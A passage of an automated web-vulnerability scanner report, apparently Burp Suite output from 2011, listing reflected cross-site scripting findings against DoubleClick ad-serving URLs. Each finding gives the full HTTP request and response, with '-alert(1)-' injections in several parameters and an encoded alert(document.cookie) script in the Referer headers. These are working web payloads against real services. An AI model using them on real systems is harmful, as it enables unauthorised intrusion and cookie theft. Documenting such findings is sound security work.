GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5f5"-alert(1)-"86f22d1910e was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd383'-alert(1)-'ea723a23d73 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8cec"-alert(1)-"2cdbd4fd8f3 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
va
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfcbc"-alert(1)-"87f30d13f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6038
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:56 GMT
Expires: Mon, 07 Feb 2011 02:28:56 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13fhttp%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6b7'-alert(1)-'41e11d4dca9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6046
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:29:00 GMT
Expires: Mon, 07 Feb 2011 02:29:00 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 851cf'-alert(1)-'7daf788badb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62064"-alert(1)-"db102385c04 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e376e'-alert(1)-'bf4060873d4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f221"-alert(1)-"1a47e7ddd0c was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3696"-alert(1)-"456ec64c8fc was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
